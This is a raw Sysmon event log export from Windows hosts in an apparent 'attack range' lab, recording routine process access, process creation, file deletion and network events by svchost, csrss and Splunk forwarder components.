11:15:47.533{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000221214Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:15:47.533{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000221213Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:15:47.533{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000221212Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:15:47.533{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000221211Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:15:47.533{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000221210Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:15:47.533{4F8D34B0-F11B-6215-0500-000000003902}412428C:\Windows\system32\csrss.exe{4F8D34B0-1763-6216-0B05-000000003902}432C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000221209Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:15:47.533{4F8D34B0-F11D-6215-2300-000000003902}20363828C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{4F8D34B0-1763-6216-0B05-000000003902}432C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000221208Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:15:47.534{4F8D34B0-1763-6216-0B05-000000003902}432C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{4F8D34B0-F11B-6215-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000221207Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:15:47.330{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=04D013A1D6FBC0042710D3DA7BC61723,SHA256=8F6E40CDB554D56AD0AA726BF87E3C31602FEB40FF8770DA18EFB091933BDED3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000221224Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:15:48.361{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B2087D9A62932DC5152453237BDB1973,SHA256=210D45D8FE4846B10EE607328A32DB2B25281A9D7DD3235FD4050D15B7853766,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000297366Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:15:46.700{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local49444-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 354300x8000000000000000221223Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:15:45.984{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51635-false10.0.1.12-8089- 10341000x8000000000000000221253Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:15:49.819{4F8D34B0-1765-6216-0D05-000000003902}31323576C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000221252Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:15:49.643{4F8D34B0-F11E-6215-2B00-000000003902}27842804C:\Windows\system32\conhost.exe{4F8D34B0-1765-6216-0D05-000000003902}3132C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000221251Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:15:49.643{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000221250Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:15:49.643{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000221249Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:15:49.643{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000221248Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:15:49.643{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000221247Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:15:49.643{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000221246Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:15:49.643{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000221245Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:15:49.643{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000221244Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:15:49.643{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000221243Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:15:49.643{4F8D34B0-F11B-6215-0500-000000003902}4121208C:\Windows\system32\csrss.exe{4F8D34B0-1765-6216-0D05-000000003902}3132C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000221242Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:15:49.643{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000221241Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:15:49.643{4F8D34B0-F11D-6215-2300-000000003902}20363828C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{4F8D34B0-1765-6216-0D05-000000003902}3132C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000221240Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:15:49.644{4F8D34B0-1765-6216-0D05-000000003902}3132C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{4F8D34B0-F11B-6215-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000221239Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:15:49.596{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0EAE07B0A09ACB1597EB206B2DA6E854,SHA256=7C62299C15BB87D1D05717EE01E5F8FC8886EB550DE84B0AE04D33EAB15CFCC9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000297367Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:15:49.147{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=91FA35D2D8734EEF4570A9B6E305DCE5,SHA256=B129ACBDA058B4F4A5A86FE2A430D4AEC44537E247735D560983808EB6E9F9DD,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000221238Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:15:49.408{4F8D34B0-1765-6216-0C05-000000003902}4004964C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000221237Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:15:49.143{4F8D34B0-F11E-6215-2B00-000000003902}27842804C:\Windows\system32\conhost.exe{4F8D34B0-1765-6216-0C05-000000003902}4004C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000221236Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 